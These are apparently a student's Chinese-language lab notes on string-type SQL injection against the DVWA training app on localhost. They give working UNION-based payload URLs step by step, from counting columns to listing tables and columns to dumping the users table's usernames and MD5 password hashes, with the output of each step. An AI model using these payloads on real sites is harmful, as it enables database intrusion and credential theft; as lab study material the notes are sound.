sql-injection-字符型-low-level-notes-SQL注入-dvwa靶场

SQL Injection-low-level-字符型

1.判断SQL语句的列数（方法一）

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=3' order by 2--+&Submit=Submit#
#--> correct

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=3' order by 3--+&Submit=Submit#
#--> wrong

#--> 在这个sql语句中，待查询字段数是2.

2.判断SQL语句的列数（方法二）

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select 1,2 --+&Submit=Submit#
#--> correct
#--> First name: 1
#--> Surname: 2

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select 1,2,3 --+&Submit=Submit#
#--> The used SELECT statements have a different number of columns

#-->可知，查询的字段数是2
#--> 同时，这个union语句还能找出注入点位置。

3.查找注入点

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select 1,2 --+&Submit=Submit#
#--> First name: 1
#--> Surname: 2
#-->找到注入点位置。

4.爆数据库名称和版本

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select database(),version() --+&Submit=Submit#
#--> First name: dvwa
#--> Surname: 8.0.12

5.爆dvwa数据库里的表名称

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select group_concat(distinct table_name),version() from information_schema.tables where table_schema=database()--+&Submit=Submit#
#--> First name: guestbook,users
#--> Surname: 8.0.12

6.爆users表中的字段

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select group_concat(distinct column_name),version() from information_schema.columns where table_schema=database() and table_name='users'--+&Submit=Submit#

#--> First name:
 avatar,failed_login,first_name,last_login,last_name,password,user,user_id
#-->Surname: 8.0.12

7.爆users表中user，password字段的值

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-3' union select group_concat(user,'-->',password),version() from users --+&Submit=Submit#
#--> First name: admin-->5f4dcc3b5aa765d61d8327deb882cf99,gordonb-->e99a18c428cb38d5f260853678922e03,1337-->8d3533d75ae2c3966d7e0d4fcc69216b,pablo-->0d107d09f5bbe40cade3de5c71e9e9b7,smithy-->5f4dcc3b5aa765d61d8327deb882cf99
#--> Surname: 8.0.12

得到用户名密码，结束。